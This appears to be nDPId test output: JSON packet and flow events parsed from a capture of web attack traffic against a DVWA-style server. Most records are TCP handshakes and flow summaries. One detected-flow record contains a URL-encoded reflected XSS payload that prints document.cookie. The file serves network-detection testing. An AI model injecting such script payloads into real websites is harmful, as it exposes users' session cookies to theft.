+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347805119,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347805119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZmVAAD4GX2usEAABwKgKMoBuAFBq0H\/ZAAAAAKACchDYowAAAgQFtAQCCAoBPBm8AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgG5Z9D1oatB\/2qAScSBTDwAAAgQFtAQCCAoD5esxATwZvAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":1499347805120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347805120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZmZAAD4GX3KsEAABwKgKMoBuAFBq0H\/aWfQ9aYAQAOXyFgAAAQEICgE8GbwD5esx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347806390,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347806390,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AxtAAD4GwrWsEAABwKgKMoB8AFC+iBnhAAAAAKACchDplwAAAgQFtAQCCAoBPBr6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":2,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgHy7zo2dvogZ4qAScSCwtQAAAgQFtAQCCAoD5exvATwa+gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":3,"flow_last_seen":1499347806391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347806391,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AxxAAD4GwrysEAABwKgKMoB8AFC+iBniu86NnoAQAOVPvQAAAQEICgE8GvoD5exv"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347807664,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347807664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PG1AAD4GiWOsEAABwKgKMoCKAFAzSiBUAAAAAKACchBtFgAAAgQFtAQCCAoBPBw5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":2,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgIqXGWCRM0ogVaAScSCEtwAAAgQFtAQCCAoD5e2tATwcOQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":3,"flow_last_seen":1499347807665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347807665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PG5AAD4GiWqsEAABwKgKMoCKAFAzSiBVlxlgkoAQAOUjvwAAAQEICgE8HDkD5e2t"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347810243,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347810243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+YpAAD4GzEWsEAABwKgKMoCkAFCAVuc3AAAAAKACchBWiAAAAgQFtAQCCAoBPB69AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7016,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":2,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgKT1xLjSgFbnOKAScSC0twAAAgQFtAQCCAoD5fAyATwevQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":3,"flow_last_seen":1499347810244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347810244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+YtAAD4GzEysEAABwKgKMoCkAFCAVuc49cS404AQAOVTvgAAAQEICgE8Hr4D5fAy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347811525,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347811525,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} 
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":3,"flow_last_seen":1499347812798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347812798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Yt1AAD4GYvusEAABwKgKMoDAAFAQTEPhWyVuOoAQAOVHQQAAAQEICgE8ITwD5fKw"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
